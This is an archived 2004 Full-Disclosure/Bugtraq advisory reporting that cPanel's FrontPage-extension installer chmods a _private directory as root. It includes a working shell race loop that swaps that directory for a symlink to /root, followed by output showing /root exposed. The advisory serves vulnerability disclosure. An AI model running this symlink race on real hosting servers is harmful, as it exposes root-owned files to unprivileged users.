lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <41739215.9050105@drumnbass.art.pl>
Date: Mon, 18 Oct 2004 11:51:17 +0200
From: Karol Więsek <appelast@...mnbass.art.pl>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: cPanel symlink chmod issue


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Name:			cPanel
Vendor URL:		http://www.cpanel.net
Author: 		Karol Więsek <appelast@...mnbass.art.pl>
Date:			September 30, 2004

Issue:
cPanel allows logged in users to change permission of any file to 755.

Description:
cPanel is a next generation web hosting control panel system. cPanel is
extremely feature rich as well as include an easy to use web based
interface (GUI). cPanel is designed for the end users of your system and
allows them to control everything from adding / removing email accounts
to administering MySQL databases.

Details:
cPanel allows users to turn on/off front fage extensions. It is done
with effective uid of system administrator ( root ). During this special
directory _private is created, and then it is chmod() to 755. Attacker
could remove that directory, and create symlink to any file, thus it
will be chmod() ed.

Exploit:
To exploit this vulnerability just link file/directory you want to chmod
to _private in users public_html, and execute installation of frontpage
extensions.

appelast@...y:~/www$ ls -al /root
ls: /root: Brak dostępu
appelast@...y:~/www$ while [ 1 ]; do if [ -d "_private" ]; then rm -fr
_private; ln -s /root _private; break; fi; done
appelast@...y:~/www$ ls -al /root | head -3
razem 2212
drwxr-xr-x   28 root     root         4096 paź 18 05:49 .
drwx--x--x   22 root     root         4096 paź  9 21:56 ..
appelast@...y:~/www$

Eploitation could be made via php, cgi, crontab or shell access.

Tested on cPanel 9.9.1-RELEASE-3, and confirmed vulnerable.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFBc5IVFTSet8AbQUQRAgMOAJ43mf1aR44bqgO1W8GWaVK5yYz49wCgh9rV
LlXPr0/6IMjxrPph48yNPHk=
=B94w
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ